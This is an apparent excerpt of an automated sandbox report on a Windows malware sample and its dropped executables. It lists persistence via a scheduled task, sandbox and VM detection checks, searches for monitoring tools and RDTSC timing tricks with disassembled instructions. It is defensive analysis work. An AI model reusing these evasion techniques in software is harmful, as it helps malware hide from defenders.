Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50038

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: PROCMON.EXE
Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: X64DBG.EXE
Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: WINDBG.EXE
Source: d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp, d40ec5ca11.exe, 00000019.00000002.2423554611.0000000000755000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 46C7DF second address: 46C7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47CDD5 second address: 47CDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47CDD9 second address: 47CDE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FFAEC5267D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47CDE8 second address: 47CDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47CDEE second address: 47CDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F3B9 second address: 47F3EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jne 00007FFAEC5291B2h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jc 00007FFAEC5291B0h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F3EE second address: 47F47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 jmp 00007FFAEC5267E9h 0x00000015 popad 0x00000016 pop eax 0x00000017 jnl 00007FFAEC5267E2h 0x0000001d push 00000003h 0x0000001f push edi 0x00000020 movsx edi, di 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 push 00000003h 0x00000028 jg 00007FFAEC5267E4h 0x0000002e add edi, dword ptr [ebp+122D368Ah] 0x00000034 call 00007FFAEC5267D9h 0x00000039 push edx 0x0000003a jnc 00007FFAEC5267D8h 0x00000040 pop edx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFAEC5267E5h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F570 second address: 47F574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F574 second address: 47F5B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D35B2h] 0x00000010 push 00000000h 0x00000012 xor dword ptr [ebp+122D2091h], ecx 0x00000018 call 00007FFAEC5267D9h 0x0000001d pushad 0x0000001e jmp 00007FFAEC5267DCh 0x00000023 jne 00007FFAEC5267D8h 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F5B2 second address: 47F5CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F5CD second address: 47F5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F5D3 second address: 47F5FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jl 00007FFAEC5291A6h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F5FF second address: 47F620 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FFAEC5267E0h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FFAEC5267D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 47F620 second address: 47F624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
